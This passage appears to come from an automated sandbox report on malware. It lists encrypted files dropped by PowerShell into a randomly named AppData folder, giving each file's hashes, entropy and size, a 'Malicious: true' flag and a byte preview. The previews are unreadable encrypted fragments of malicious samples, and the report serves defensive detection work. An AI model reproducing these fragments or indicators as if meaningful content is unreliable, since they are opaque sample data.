Preview:	.7.@0.....@....Rn..,r+.. .>l.....S..G......./.\|.U.....o... &L....0'.oK.T.N.T.........J..v....0..........@..@.....Y...K...Y[b...\|.......q.....5..."...?..HN4sH.z.N;......}y..6..u}o......hSA.h().j.........tC:q.c...F.&F..R....Q.N..>.x.r..>w...Cj].Dd...0MH_."q.%.g..I.Q.....m....?0.z+E....R ...>.n..l...]Z.S/.U...z^....\..NW.6...(...6U..."..K66&....rj...d..#..y.-$p.D....\|... .e...h....-..@...N.......Qt..cK..g.]?o......Pw......g2.l.....[..J.d.........8za;....Ct....Mr38G.y..u.....4.k...hj.j.....jS.v...$.......v^....(...{.U.q...d..j.q....S...<.u+...N.c\M...6......I.@d.z}-..p.9ZW....N......."..Cy...!P..../.....6^.p.n.c....[i....Gy6.veh..n....c...).......^.I..'...p-.....o,.oE.S;.Ox 0....0.5g.....3X.~...&..V.u[..m..a..Pjz..^..s. ...S.......X.a..o.W....2p.E..#f;+&...3_.e..J.8.....O..:.. .....u3.,...i<`n..".s8.H.R .rR..3wuF<s.k. ..8 ...Y6L.2...d..U.,.......2.B..S-^..:X(...&...C.k....0.De&..'...ZX.U>h....H.'..Z.:.._...d.YT...3Oo...-....q.v..(..D.R).[.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\tjGlCVFmuniRcvYBNS.vgKplCsmWkGH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	190360
Entropy (8bit):	7.998833859748536
Encrypted:	true
SSDEEP:	3072:/WBWEDVuJc+xCDN2GKA9EbpOvJK4ewqg4W2zgoNk/LNdVaLi0zrgbTY1iNB:OrDUJd8EGJ9pRKJg0goazNr2H1ib
MD5:	8118BC40DBC12DF168DE5222F92F272D
SHA1:	9F4C249083FADF3DF2EBDAD6DC4A42BFD55A2518
SHA-256:	FC94D749562FC72FD1F3CB321C869D487D7776F58ADC83C216B2F6C3C64C5CD8
SHA-512:	04E9FFF34F49177FAFDBC66CAE28D90EA66D0373DDECA8696A2CCD82A28BA1EFE6FC096290EE79E436D16DAE2C3ABEDD5620B1BA02983F8F8B6DF36A9DEFD604
Malicious:	true
Reputation:	unknown
Preview:	d]..m.L..;../..T.>1.F._.h..c..oy..f.x6X...:.....;{....-.4_.....0f."..h.'1Z`...p:pc?..........%..d...`.....bj....w..<m..~9/g..3q:.K9X...,.4..@`.j.E.JO.X....0..p.Q'xm\......9.0=.<...&.^.:.....mx...t..............=.z.\.&.($vP.$..l..xCs.M....U+.M...:..k.~..3..=......<..3.V.J.kI"..T...........B..&e...7.(.^..e..m.. 4.{I..+IC;...f.E.L.x.....P.?..%`.z.,..B...W....LQ!...C.;...:;..)U..\.9.l..t.X.s...+...9xmI.w....F..L..)..I;%LGxw....c.."..Mn.U.F.jv.j...O7..S ...$...>.....[.4..w......_..kG#9...n..!uw.`...Q%.g..t.$.Y..C.8..o.5..0Vh....p........!i...(.M..Y"...T.{0.l.....4.153..Md3...x...INe...k..\.\G....W\J`C...}t.C...nJ>.........3U...'.2..."j....v.....E....H.V...K.....P<p\.@.h.~-$h.>.$.kU.wQ..D..Z2..}.(......+.c....\|......L.j.%8L.R.!........Kg>.F...o..a..L8.1...E....w.D~.Y...#.uZ..P.F.D...Z.Gl!-.in.g....G><h..1.g.o.......v..e...6...B..^g.z.....i.lm.e..\|.m>=.\..WS>.%,.8..C.{.....t....J...9.....u..{.@...%d....5.j.s..`k..v.%.......4.L...-..Wup.6./.#.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\tskywKHRGqhu.osSCvgPNDGrjHK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	84367
Entropy (8bit):	7.997903472492386
Encrypted:	true
SSDEEP:	1536:p0qZfJTb4x2KcHeex7pwUA1YiNaGyjVdFmvnoaazsPp4gJr8kHpqhujWsTMg8:xZfNb4x2KobxKUA19cGNwaaurr8kHsg6
MD5:	AEAEEED3DFB7FBD32B7294E30928DC9D
SHA1:	60C7F23FDD7D2E3D5E5A8FFCDE1BB8E225DE67A9
SHA-256:	C07A7F5ADDB632FB7BB792D4BBE88CBF0BA4A3C534C7ACBFD9C0192C9619E523
SHA-512:	B65CD6D650CD51E2444EF20725205BDB693FF14C83208549BAF85AF55DD715937285EB92A4146C39AB855C0A01A6553C6580B4F55F6746BBEFF308A4D92FC82C
Malicious:	true
Reputation:	unknown
Preview:	...~@.F..VE....m...w..s.3.V...lY...<..&..).H....:S\v...[.v8.G......u..P...%X.h.ko.M...te@.........U.}.%E... o.;.....p...p.b.I.&.VE=......E..T.".i.?.+]I1F.....p~n8.......h....{l.[)I$.....:.........J..mEg..".....#F4I{...K.......".u...U.7."NR.d..=..n./N{n.......n...Xj%....(...{.BT..6EAap......[...s.{...&.....H....iu....2..H...F.sB.z-....W'...M.Lb\|..vD....I....&..h;Zls..]/\..u.x.Q.y..,..=..v...[....d..Z....8Y....(w..q53M.0i.z.Gg.BEN(...xhic+.M.-.3..1./.V.;W.....o.^.h.^..."<...)d...W.jM N.r8.....;\|.c&3.G.. ..F.....w8>..^....P......0..#.M...q.A.!.D..H.J?A....n...h.T...?.>..L..(.D2jhS../_#...S4.:sp..O...-M.0 ...*..m..r..,..9....t....aTG....>e.....%....".1....4.8....A..e.R...74.xO..O..s"un...,&.P!OiX. Q 47l.....]3=.....V..N.[..E.7......;.....5..2.;.r.$,.)..U....fI..,Z.@{s.y.&...^z....n.t...}..c.EpY..2..J.B...B..@.r.5...X...W.p....jn.#q1.q.B.N.S\,...;...\.Z:....x..m.T.....!..0.._.c]..\.s.6'.1A%.W..T..UQ...^.G.?...&.J...]`..]...a.I.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\uOfsZbLFXYzQPTiR.uvJsIVOiyfEbpMSk Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	90824
Entropy (8bit):	7.997910262725696
Encrypted:	true
SSDEEP:	1536:Whr2ehAgctwWs7Brp+H9vcCN4FztQTxaWTSZ2d8ZIBZk2nxhO5U5r:WjGgctSF+H9BWuVGK8iLnx+U9
MD5:	53937EE686880C448469617B84132258
SHA1:	8729410A7C12A50082620506FDA055B9509D02AB
SHA-256:	70739630C413AED5451047E775A63A2A112141F24E770386A2CB1AE4F41FBFA5
SHA-512:	52D0A8F13613C744813CBA330A6AECDF7BA8369C766FC941E68E0871F329C8E1B911FE7C8492AD7CE52AB265A923DF245FCE8D3D81A09A51FA26F246EF6B23DF
Malicious:	true
Reputation:	unknown
Preview:	........3..&..y...{:.7..[tr.`.}.,S&\.C.).Q."..J..P...h.)0V./.:.%...ML..IKR.+M.N.s....C.R.O.#...r......D%0.`.UN........5d`...t.hk..B(pUm......]...v...$.j.H.h~....J.V.%....g..D1.d\.v..k....qU....R~Lp...2VW..L>7..cH.F...:.}..W....8...seA.....9.q...;8n.0.......f.yR..........F.e..n.v.{yO....c.2.....3..q;.<.....4...`.D..C>.[.\_.....Y...=^.......F..5d....f..w..L.k.O...VX.2..w.\|..TE.f..\jle...._Y.Y........Q..}.T.....'..b..\.D.K#@aS~.Z.3..~.[LM..8...d.\|z.p..B[u[.5..9.R.....f....sQN...a?.....;b..0.6..#...E1u..a>n..&.HFt.Z.... ...e.u...T./...b.lX.......P.\|.b.T{dj.Y.Y...D..,Pav0a..%......F.uP.....}eR.3\|..\|.,..x..E4......X.x>85dDb..9..&.a._.Y..`.....#.....D.......R...m.i....L....2....fS......J..._....xUj......."....;.T.~.6.-ci5M#...M...:T..%q\|......#...f....3...P.E@.z.R..Xz......K..B=.......'{.dj.ql$.".....d...v.^...]_,A.t.....Ug.:P...OP]..<......M\%.?....1.....%......*.=...A.X..e(.%./L{P..-.........%...s%...q......f..\|A..F.J.5)<<.k@..F..W..5.&X,6

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\uYwxUehiSoWqHcGpMtd.wzTNkYaZOMt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	96354
Entropy (8bit):	7.998247015816282
Encrypted:	true
SSDEEP:	1536:9KCT990YADjs1zu4hKT/C6ZQZ+1tYQELSVgOgB11bupfSqWH1D:9KCSjsKauZ18LS5k1bupfSqWH1D
MD5:	B9C09D2779CE68F6EBEBA6C14DB62630
SHA1:	69C1A6FCFEF9719402129A2B5378AEC26985B9BD
SHA-256:	59CA76211F5A8F50D09E697A8230B9F1283534AA04C7608B263D46184A9E02D7
SHA-512:	E892320FB5139C082C0D057C80795E4741AE8C19521D7F70C0DFF4D313F0DFE8139A4095DBFA85297D308B719AB525ACD7C09C555064C0AAC63F5A63038EB22D
Malicious:	true
Reputation:	unknown
Preview:	j..w.:.............`.K.t.FX....q.C..,..>.........%.,..XZ...........'u..bG....#..(..<..f.T........C..@........~0.aj..._....Tl.X.2G@..{.F%.Zb.\...!9H^.....bv..F.U.=.(.T@.O..85.vK..X.Q\s../.\|m...P...S......x.....6..J.[.%\#.o..x.R..9..}Z?T....d..<....;....F..J..M{w.r..cK...Jt#3...r.UMx..7.V.j.a3..w(f~.w.w=.../X3...!....+...:..E.B..n.3...%%.'.6..m..}..S:...<+..^.'...B8.I.....tAk.y..o..w!..dX5:#.P.....L4.....>T.(..x. .3.>..b.e.....?.v.OWl...&...FV.2.i.Q...c..5...e...B.(..j...8P..-...../......K.....F.K..+l2&.r...6..<(......?%R.)....x.;..i..h.D/..t..0<R...F.......mT{.....K..=m...5t.&.R..c/z&.4;W..Q..t.w..P...7..*.p...%$..}...N.eCG.Td....1C............+..oh.^...3.M.x=~f...+.%.w.{.Jx.....)6.r&H.;....O..u..D........]z^..u.G._.v^o...,.F..j...f.]C7I..g1..v..z0.{..I@..=Z..2R\.....?...ru.R..)cY....o......v...\|...x....w..Gd..08{.;..r6..$....vp..........)~XR>.iM..h..j..f.\....L....z.......#..F8X....D^..kS8.Q.8.b...."..O.u......9.C..<

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ufBWJYvRASCGNXlz.PsnVrajykw Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	137717
Entropy (8bit):	7.998627075810569
Encrypted:	true
SSDEEP:	3072:6bxcthvIS2+LWWh4W0A4Ve1/eMjN6LMvyXfa0v34NbtF:actySvLLC5A4gzjBCdcZF
MD5:	074589DEB0F5E0711C2BC580AF6E3FCF
SHA1:	1E831B9B1870C89859841E3F8BD7CA96FC8BC637
SHA-256:	9802C83EDAC7EB1818998C33C5AFAC979E9C8E59BD7E6D5CC10DF94AAE74AAA3
SHA-512:	D363AD749420735438F7DB624C75C6877B269031D8896310884D762EEAC5DA809A7E4E3ADEBFCC00AC7B0FBBC4A45640804FA09B2575719533B0E7B419FA5E73
Malicious:	true
Reputation:	unknown
Preview:	....u.T..C...9g!.x3...=..M....u....I.........iC%7..$....(.s..+7..\|.y>..x.<1.xQ..^....B..l.:...u#..Q...X.a.......I.F...........fQ..uX....w.Dr.3P...a..{..I[.jy:.d(...d<p...a=_.{.....4....>9"..p..._.?s..7...B...././...sz.7.L..Q'./.m.".K...Q.Y..2A..:.KK.uu..) G....]..Y.Q.)....3r..."..a.....Sh...[.....s.GG.y.....t%..L.. . ...{........... .4.a.. 6...B.zR.&C.sq."........l.L.n'.....`#r.M.].o.O.Hv...yyq...=.K...X...].bPR.g......v..qy^g..4...y..~.....*=&e.w.. .G..K.."E...-TQ...j.D]Mp.K.T...;..t.`...v....T..Hv........./.....$y.].....t.v.8bl._[.0......p....=0.w..._..g.%N..(........YI2^...8......V[....3....).[;.Z9..y-vW..#...4$......%/.W.g..S..G...).N. .t.........cqZJ..Rn..jrS.}0.a...2.8.RWs...........Mg...lK0..o....?............a.1...NV..b.'.-....5.....R..O..u.=...;\|_..^k..Kvg.....o...0.}W...Xqv..D...cP3-.LqW<..I.G..pL.l...5{..d5.......)>......./......S.n..,L."%y...;.G.#.`.._zm!..\|...5EZ......]..X...q[.l&....D.},.=.D...\..&.a.V........Z.J@..t.6

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\ulnWTOLiYM.buMDFIqpBse Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	180608
Entropy (8bit):	7.9988527480901785
Encrypted:	true
SSDEEP:	3072:pUASurbCptOOlFfOtP9I+SU8YD9IUZ2RgQgiZ7fmMsx1tkMCa16n8HbNJgG/nrZK:mAnOpt3fOvDNZmdHeMs9kI66zgGD8
MD5:	3BC92EBC1F5777962C5FE0A8DA8086C6
SHA1:	21D4B0F7ADDC5721C93FC65FB2CD8F38352FC512
SHA-256:	CAA3BD3AE724E72AC52F87AA36CE1B1F268979EDE6147495742B3D29EF4B7F6A
SHA-512:	1B89E40629D832CF6F9C4B274719230939546095CD369F5CC02731E1EFF468EAC58FF2B4A16B98BD6F2A191CE1647C0018FBF6BEC2D83F1BD9A915EC80C7374B
Malicious:	true
Reputation:	unknown
Preview:	....u:...B..z4CW75.?/.....B.......h.........)."y(..\|a.D......Cdb..&..o".R4t.a.Ip_w..$o+^../.".........M.....~....9.BY.?-.b..i.4w...%..`\|...MF.c....G.?0.d.A...j.6...t...~..'..h..i%..I.G..r.V......a.oX..or..[........Ww$.0C3S.RS....\|H$..N...G(T4.z6.5..'KK[T;..Z"L.9EM...e......w\...".^1...0.5.%.Z..,\|.l.4l-.Se<..j.O)...P.N4B.q..../.+e....uvRb.....]...ABR...).7.b.q.5...y..A.b.w6.\S..#I..F.L.+....%'6r..Ez..Z...Qj....D_..L,{....Q...Q....%..p...X.F.%..Z.......m.?`........:......v..oGU@......tX0:Y8..1.>.`..T4.0....DLA"..P.#...W;..A.1..t.....}u.I...'.{j.G....x..b..X.`.c.......&."..X..O.-.. 7eo.....O...hd.8-...V&....:?....~...-...YB..M.C.e....?]...QT*......;<.m7...%t..O..h;.P.`:.6.I....H.%..ej.F.\7....X...3H.e.J.k.2."8..)....6....];=G]..+T.-..m.....:..G..d....>{a......y....i.g.......uo.!.;V.._.....>......nx...}Gz..7..7....B.....Y.p.....a\|......z7..Hu..a.."..d..S...p..7<6]...hx.A...W./...........:%.=....pb).".Eo1r7_^..w..u.n..........S.U\|{..z$.

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\vJEPDwSdOAruHCf.hoeuiPUEHjNI Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	68956
Entropy (8bit):	7.99727801281808
Encrypted:	true
SSDEEP:	1536:ywgBB9O/RG9rfFFOSBfmpFjCh9PtAWwhu0dwV3:JKBe0rfFdBQFjcNtbwZo3
MD5:	DCA808190D2D58DA3BC8302E58121EC5
SHA1:	27B81AA3189B723561ECECFFD9061B6900FF2361
SHA-256:	2A12A2C13EDE6B3A21B940C48801DBAE851E66374C12BACA41AA2A216DF25EBC
SHA-512:	9C90DFEBBBB1298FCB465AC04516AFC35D0545BA82755884447F2E54D82E6F0A89D956380589D6BD7A6DD263197E04CB3DD6F0F4A045E30BE433257859AD7D4B
Malicious:	true
Reputation:	unknown
Preview:	.W......J......c........:.E...l..s.Ei.7......0.h......=X#..%U4.ro.rX.C.e..!0.S....G...'5.!P"......q.]MH...6....@.?y....J".".B.,...AfK..A..1._(\|P...,.....s:a%.P..B..4..j..U1..o......t...N-.s.3..4..4m.A...5o.@.S{....d...\h.N.1!....e3.....WO.;.....p... ...7....zjC.{JK._sW..Z...2..]..(E#.;...n......@.qV.b.X..dd..]....X2..S].:y....0..g.. .9'..^.7.$j.+./....'..Q.......D..8s....}B........gn...x....e...%.-XmoL..G....2OVR..2.D.&.......{.bF..!..OX"a..0p.r.R.Q.hF....j(.f....@...!Q......E.;.^.>z..@....0..O&C`..U.......7...v..cr2ub...k......kM.=~BI[.kDC..C...]m'..?.`...)8T&..+.\z.'x1.@....&A.?j.....i...>1g../m.. .......g}....}......Qd.yf.[..:x......@f..'..[M.5........B;..1..l.ubY.F...;...[h..._...T...........{j.G..... ....%0gy( .`.j....Q....k.......&........O.z....X...Fd_f.nv..x`'\|\|./w..i..#q.S.z.;..C..{]...>.u...[..e.fS..@......X.v.....'N..FT7......r\;o._.A..7......y.k)k35lP]..&....@.b.K'.p....yn.\.6..)..../6..R.}....C@.}b...*.2..-...`PH...$..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\vOhWVLPyAIbJwHSmCt.wPifdBZjlX Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	69854
Entropy (8bit):	7.997789378367567
Encrypted:	true
SSDEEP:	1536:d3UhtSJNwq3hEB+T8m6KOrd0c1yJfNB7tLi0mZt6g1G:ZUhtSPEB+SOZfj7ZH8G
MD5:	1E9FF2D0684A417B0A4E4FE872A9F8BE
SHA1:	19161D590895B0888483992D544FF6BF8E34B887
SHA-256:	A08E46870B860247B71074CE19A0CB36B32667BD903F817ED62BA9A83B4ECBAF
SHA-512:	3528648263FC708FBB34699293F281511398097740BF3A191F85EAE0A7BA6A0063CE4F0806E4E1CB05F11CDF3A6228999674176F792A6069BD788E449D6BF92C
Malicious:	true
Reputation:	unknown
Preview:	..a;.m.%q...W.?..V ...r.Z.@7.X.1......Z...W.(G]_b".F.K.b.k-.T..l..}..2.....s..0....DHk..r..j.b=F.D...IgJd.ES1..:L.[.(.4`.g&....^,..r..dVN.t&...>.....'......A=F...p..M.@..GE....Y...\|..D.~.........v@..0{.WLD\|.<bZ.G.y............m-.k..:.l....-Q..Y....V....#"X.u..N.S..s9..5.\.jV~.a+u....^wr....8.\|.o...8...@.8.....(?.[.../.$.?..R.a<...\.>...s.I(.W0.q...G.......6@K.Y.-1.....4..d....+_.Gs.?.F..2X........._..A..9/]_ -..Sw.w!.0...!.i..2Kj....1...Z.8...p...h.-.A.#...x.,..B..nx..n....!...-\.`.f....?.c..^="/.e.W.{.v_.ng..,.&.........@.c{...,?1Ib.IE!Y..].p......!..?Fy;...:.\......_V.~..;.....9...W..a.p.v.0.1..C3.4/5.[:.>l.._Qg.....nR..=....xDP..U....#......).....r.HX..f.4Y=F.Ia..F.. J.,Y%+..q`u..#.\|.Li..G\|=.7h..j[.k'1....[X...J.=tG(ZVy[h........Ym..}...N,N....2.B.....l.c..v$....EK...H+...._ox.....g.)..:8T..K.k.>..pU..qO. @..O. .."./QX.S%..(.1..P.....{.J6.....qJC....e.arw.\|'r...S.z....?.B...N..S...C-...#.)mL5...Z...I.0I..I#W.p..]6...U.W.r..+......M

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\vVFBEQOPsq.cPplmezafFLEA Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	170986
Entropy (8bit):	7.998881012561871
Encrypted:	true
SSDEEP:	3072:oONwuJFf1ceOw9ykXEQRXL4oJxntIuEQQ6L0QJeJTZEzvpOw5E/nhSMx3P++wYZz:oSwYf1cej9ykXEMEo2uEQQ+JkTghFKnn
MD5:	C8800A0C44089F0C53B8E23176B956A6
SHA1:	E2DC1276D7841ABE116E251555B94C721E25AE52
SHA-256:	43ED5C8038313FA1D6817ED05B5A3D134101C56BBA9816C69B44AAF38C413D7A
SHA-512:	C1EB33EEF2281171539E09AB6A6A0AB2FA47EF31693ACD5458EBD67EB3B432AD5004AF5B51FAE43B93AFE0DC32467411906509ECEB412A01DE7B89D2A9D17818
Malicious:	true
Reputation:	unknown
Preview:	g.D..^.f..E;.....G.}. .l...2..i.IV?#@.....b;.l.E..=.LG"........@.g.........l1.-.....2...iG..".<L."..q...{c1...{\..._x.\..Z...y...6.1{.M.....L.h.,O.{.b.H......jX.p..W.s.k...S..).]1.l...J.J.;l.RX5..^.,.Z.Z..6...d...Ay0)<!Rz..E...0~U.......NT.qQ..7.......w.F...+...^"........v....Eu..Pw.........(4...r"3..O.).....o.!...H}...4..).A,C.>"B..'.{x...t..>...........P~.;.L.$...3....\|.5x..K..H...N..=.'Yc\|>(..-.w....Qp_.M2.Yr.A4.K....P..i....s.iU...3k....'.".c..l....H..c.x.....<..r...)-....i...l[......ai.2...q..h..>I........k.u\.....}......;Y.~.E..:.J.R..+.0..hN.e....Y..~....2....".JY..~....".}...x.F.H.K..W..^..,.......h..a..k..(.TA."..6P.&R..U.pl.Q..1xz..lIT9?.6.w...h.:B\|.....utO.#..,v...........Nq\.6...`\.:.R..T#x_..{..Z.f.-....%.,....8f.9....s.lj..\....2D...,.>(.i@8%.q3=....f1.......wO.L.KC...a .A3D.A(.W....}Wq!LW.h..W...91CE&\Nv.......n-..p}.D.xJ.m.?...cJ..!..E...,../....:.....m.gq..W..g...Y..L..>.$.....@=./..HR.2..X.n)o..........B.]!..?&n.oR

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\wFosMBlNnj.pwrIhQRELOtAs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	194138
Entropy (8bit):	7.998986399948294
Encrypted:	true
SSDEEP:	3072:+P6iHO6JrzFQ6MoWbvzIk4A6ZJilzIg/2e6nLE+NM7dwnUTXL1k9gesvbCMtAfQz:kbhxzFVMoyvzIk4A6qpIm2eaLu2nUTX7
MD5:	466614C55EDD66CCF754C743198AB57B
SHA1:	6694830993F276A631B36CE73BDC4F0D78A8ADDB
SHA-256:	D49F5C4026DBBEE89707E825F8DBA262345FFFC04915C896C80A8631FEA753A8
SHA-512:	3B1AD8D19709768933259ED4C9C0034F4A6F2D0452C2D77049FC1A928CCF4AE99DD73EE2DF2CE41A85D34DDC5E5C0640F91FFA5C7189BF3FF77E07ECFB74340A
Malicious:	true
Reputation:	unknown
Preview:	f.i...A..5H.8..2v.zE...{\..5.@a...y>4....N.@...~?x......7....1.X]...7.xN....;...D..?.&4.... f.:...y#.....V2.N.U......6.....W.snjjS...~..f.!..WIF.Fkv.LB...}.1m...e....H...4Bri42..U,....S4.p...4}.sU.M........L.J_..........p.;........zG...7.C%.e...X..\|..+..'..m.[kc&....l.>J5&Zk........ak....5....v>.3.K.<(>........g@...>!.:\......,`.A9d.t...Q.?.......Py..:..Z.mo..b%<0yii.\W..hR!.m.......Y:...P.`..g.Q.{E.9.v".\|.B....c'I.?.v.......L..M.Y{.a..;v:...W..u..;.p.x...j..o.....d..'^.....N!..D......^...}.u6..... ..Nq.z'..H..*...4..U..z..V..K..#..Q ..d.e...R.].8...................1Zn$V...K...^z.@../.0....i...6jI..Ns........g.e.z\...W.X...%I.d.......J.+.H._.q..,J.eH...,._....1R...acA..,0..0.R.8......H...v..Iy.=.;............ejg\|+......q.?.<.~#....oz..t..q.?...Nk&.\|.0..p.. X..N...@..h...V/9..0.aK.1>.e.V......./....@..i..A..'(!,l.c....Lf....m..,"....4..6Mq.........2.7..n.Z`.....2N`.......`....`=@..8.1..;..z.$...".....]y:..s..{.../Ch.w.JB<..W..>.H.`GI.m...'..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\wKlguLnFVbZNShYjprA.wDGbgRtmJuIlXNW Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	171153
Entropy (8bit):	7.998874003641522
Encrypted:	true
SSDEEP:	3072:bjUwLHCaJ0OtVNH+QBB+9+ccvvMzxli3B/a5PKt97w9qnRfEPnDcvt3lL0njG:bjTLHTtGQ7tCl4Ke9rRfEPnDSlLsC
MD5:	3DC522F7B9CBC26D94FF2B64CBE1CE5C
SHA1:	B4511107B6CDD64EC215C3BD1D3B792FDE310C7E
SHA-256:	CE786F3067B497A9B567BF21F635A7E87491C45BBF0E58EA72A040E2AE688DA1
SHA-512:	DA4718418FFB5FE39B95EE4E6D4A03C52030433A4FCF0AD30E0ED803C9CDFBE9542451CF3D2C9A92E46632DA3CBB07518705AD52227C5969CCC564E12B5F89B6
Malicious:	true
Reputation:	unknown
Preview:	[.Phb..A..@..^.n....<9.........m&.........."...`.....yI..\...>X...aWM.~-.?.y.x(.....D....>DMX4.6.m..8.u.J.....,%.p..... ..g.ID.\|J..w.f.G.......(.... .......X...\..-....`t..h.1O.v...)...f.#.@HqAZ..z../.....TF....oo.;.L..3..F..:dN....})o.'.j.2e..2..,m..yAi.....?kG......%)D.d..#/...}W.=.....{..r...8...CH.<...~{.,...u....r......ho..9.A...Q....\...^.....p.`..>.;...X..Kt.t.<.._A.gm&.....p.!.2......$N.O.A.^3.. .y..m.....oj...B.:..[R..Z.G.^.{N_yTz..h.b.8.[3ie..7..U.r....U...H...U...h8.{g..C..#\|..~.........T....of........$.."...'r.L".\|...Fa..P.t...%..)=........a...g....sM...xG..=S[.'..[S.V.."Y;\|.(.-......8e./}f...x.O.....s.....D.z/%.. @.-".&...N...@.........Y.H.7...XC..\.2.q<.C.IKA9...(............bj...2.&"g..J.^..R....T.2.r...m.%.m.#.j5.L....5......M...u4...6.1...)...`q.Q....=.b..>.....~...R.......?.4.G2..r....C.J..L..`;.B.#..Zy...6H..H...._...3TF..Z..,.T.>...Ze.P..?\qAN..#6I..2.d>.....t.;.k:...X.=8.......R8~....8.3.h.`.,w..oZ&

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\wWGZCMIvXd.spvGAyXPZTxmOqeJFi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	156006
Entropy (8bit):	7.99882941593735
Encrypted:	true
SSDEEP:	3072:+P6iHO6JrzFQ6MoWbvzIk4A6ZJilzIg/2e6nLE+NM7dwnUTXL1k9gesvbCr:kbhxzFVMoyvzIk4A6qpIm2eaLu2nUTXE
MD5:	72B7D33721A5AE4DD704A0F03163F412
SHA1:	6403BC51AB360266225F81AB58E24318B5102E7A
SHA-256:	CD19D42AC2835D1241293EE67B7CE5154E563E7497FEA41CB6D095EF7D55B7C2
SHA-512:	4EDA7539619813F04B2968928F3C582D571D6C4A2D7BC25B776F0158987128C2F62DC2A77C70F194B6BF19194DFAFE51996ADF76548C908A438468946DC5CFDC
Malicious:	true
Reputation:	unknown
Preview:	f.i...A..5H.8..2v.zE...{\..5.@a...y>4....N.@...~?x......7....1.X]...7.xN....;...D..?.&4.... f.:...y#.....V2.N.U......6.....W.snjjS...~..f.!..WIF.Fkv.LB...}.1m...e....H...4Bri42..U,....S4.p...4}.sU.M........L.J_..........p.;........zG...7.C%.e...X..\|..+..'..m.[kc&....l.>J5&Zk........ak....5....v>.3.K.<(>........g@...>!.:\......,`.A9d.t...Q.?.......Py..:..Z.mo..b%<0yii.\W..hR!.m.......Y:...P.`..g.Q.{E.9.v".\|.B....c'I.?.v.......L..M.Y{.a..;v:...W..u..;.p.x...j..o.....d..'^.....N!..D......^...}.u6..... ..Nq.z'..H..*...4..U..z..V..K..#..Q ..d.e...R.].8...................1Zn$V...K...^z.@../.0....i...6jI..Ns........g.e.z\...W.X...%I.d.......J.+.H._.q..,J.eH...,._....1R...acA..,0..0.R.8......H...v..Iy.=.;............ejg\|+......q.?.<.~#....oz..t..q.?...Nk&.\|.0..p.. X..N...@..h...V/9..0.aK.1>.e.V......./....@..i..A..'(!,l.c....Lf....m..,"....4..6Mq.........2.7..n.Z`.....2N`.......`....`=@..8.1..;..z.$...".....]y:..s..{.../Ch.w.JB<..W..>.H.`GI.m...'..

C:\Users\user\AppData\Roaming\Microsoft\rRkUWoOfbYI\wXkhnqOzxyHdvUWEBbS.ovwNVSdlhPntZ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	109456
Entropy (8bit):	7.998407297014474
Encrypted:	true
SSDEEP:	3072:yrXzy8fgSk4AiShxOS66LkN4OvJ/7w/XK8hroasFe9P76:MDy8fgSMxrJ6qq7Tg68hrofFe176
MD5:	E4551533DED07E940076E7828451DBBF
SHA1:	5325E509D86A8C40928F8537024E276765B90E3E
SHA-256:	E704C4FE9A38FCA0DA4CA4FB2D07BA6DF0A4DC06898907638AEBA05918FEC501
SHA-512:	A3B0028DA5945CC100320A345CD414A7FC95E53A031A182F8D84EF654BF28ABD07DAE8633FB11B216D7A9D96AB9190638FF1335D46C71757D33BC8E50D952E72
Malicious:	true
Reputation:	unknown
Preview:	Y1[...^i+..r.3\..2tc......5.N.Q..0..#.M.9..O.k...(4..0;.J..Qq.4.{ojx.as.n).L$..>&Z....o..0.&H.....I...i.O.iA.a.....e...i.u.L..a..[.=.m...K....QA...?7(UI..w.h...+@..&....L.4..g.7../..w2.u...7..T..P.......V P.6.\..UU.....H........!?....w%..&.T...=..j.ETwP.AV...lu..?=....F3RP.....V.;=6..5b.....J.)..W..k.....^.j.T...T.HRVY_$LQ.E.....1.F.../...w.^H@."..qb.F..!I..@K......bF'U_..\|...{..........G.W..xX..@.J.J....Lf..M.<H]h.....H..V.U;..s>....v.W..?;c0.^O.;=....L....f.n.......[.....wT[.....s.R.T..l...c.&c.v 